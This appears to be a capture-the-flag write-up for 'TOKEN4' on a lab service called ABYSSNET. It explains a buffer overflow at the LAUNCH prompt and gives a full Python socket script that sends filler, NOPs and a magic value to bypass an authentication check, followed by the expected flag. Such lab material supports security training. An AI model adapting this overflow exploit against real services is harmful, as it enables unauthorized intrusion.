master
Raw Download raw file

Code Osiris – TOKEN4

Target: ABYSSNET (abyssnet.dbs:9999)

Background

The ABYSSNET launch terminal mirrors the trainer, but expects the magic auth SALT (0x544c4153). Overflowing the LAUNCH prompt with 32 filler bytes, 4 NOPs, and SALT bypasses the gate and prints the final token.

From Nothing to Working

  1. Connect and choose LAUNCH to reach the code entry prompt.
  2. Craft payload: b'A'*32 + b'\x90\x90\x90\x90' + p32(0x544c4153) (the ASCII for SALT).
  3. Submit payload; the terminal accepts the launch code and returns TOKEN4.

Command

Save and run as python3 token4_exploit.py.

#!/usr/bin/env python3
# token4_exploit.py
import socket, struct, time

HOST, PORT = "abyssnet.dbs", 9999
SALT = struct.pack("<I", 0x544c4153)

def recv_until(sock, marker):
    data = b""
    while marker not in data:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data

s = socket.socket()
s.settimeout(10)
s.connect((HOST, PORT))
print(recv_until(s, b'> ').decode(errors="ignore"))

s.sendall(b'LAUNCH\n')
time.sleep(0.5)
print(recv_until(s, b':').decode(errors="ignore"))

payload = b"A"*32 + b"\x90"*4 + SALT
print(f"Sending {len(payload)} bytes")
s.sendall(payload + b"\n")

time.sleep(1)
resp = b""
try:
    s.settimeout(5)
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        resp += chunk
except Exception:
    pass
print(resp.decode(errors="ignore"))
s.close()

Expected Output

PCCC{CjEx-8843}